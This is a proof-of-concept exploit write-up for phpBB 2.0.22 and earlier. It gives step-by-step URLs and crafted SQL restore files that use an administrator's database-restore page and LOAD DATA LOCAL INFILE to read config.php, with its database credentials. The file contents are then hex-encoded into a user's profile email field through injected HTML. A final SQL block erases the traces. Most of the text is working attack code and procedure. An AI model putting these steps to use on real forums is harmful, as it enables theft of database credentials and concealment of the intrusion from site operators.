## phpBB <= 2.0.22 Remote Database Authentication Details POC
##
## This text will show you how to get the content of the file
## config.php with the 'LOCAL INFILE' SQL command. You can also
## do it with 'LOAD_FILE' but you'll need file privileges, which is
## not interesting. To do it, you'll need Administrator rights
## (we'll use admin_db_utilities.php) and local_infile=ON
## (you don't need file privileges, that's why it's quite cool).
## PHP scripts should not permit the user to execute SQL commands.
##
## 1  Go to http://<victim>/login.php?redirect=admin/index.php&admin=1
## 2  Log in as Administrator
##
## 3  Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>
## 4  You'll get a full path disclosure, note it somewhere
##
## 5  Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>
## 6  Choose "Structure-Only backup" then click on "Start Backup"
## 7  Now open the file and search the table prefix, note it
##
## 8  Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>
## 9  Create a file which has this content [replace <phpbb_fullpath>,<user>,<prefix>]:
##    /*----------------------------------------------------------------------*/
##    CREATE TABLE tmp_hack(content text, email text, viewemail text);
##    LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS
##    TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
##    UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE
##    username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');
##    UPDATE <prefix>users SET user_viewemail=0, user_email=
##    CONCAT('"><br/><br/><span class="gen"><b>Encoded content</b></span><br/><input',
##    UNHEX(20),'type="text" value="',
##    (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')
##    WHERE username='<user>';
##    /*----------------------------------------------------------------------*/
## 10 Choose the file then click on "Start Restore"
##
## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content
## 12 This is the encoded content of the file config.php, use the pack() function to decode it
## 13 For example, with php, type this in your shell: php -r print(pack('H*','<encoded_file>'));
## 14 Note that I encoded the file content because the raw content can otherwise produce an SQL error (e.g. login.php)
##
## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:
##    /*----------------------------------------------------------------------*/
##    UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),
##    user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';
##    DROP TABLE tmp_hack;
##    /*----------------------------------------------------------------------*/
##
## by DarkFig <gmdarkfig (at) gmail (dot) com>
## http://acid-root.new.fr/
## #acidroot@irc.worldnet.net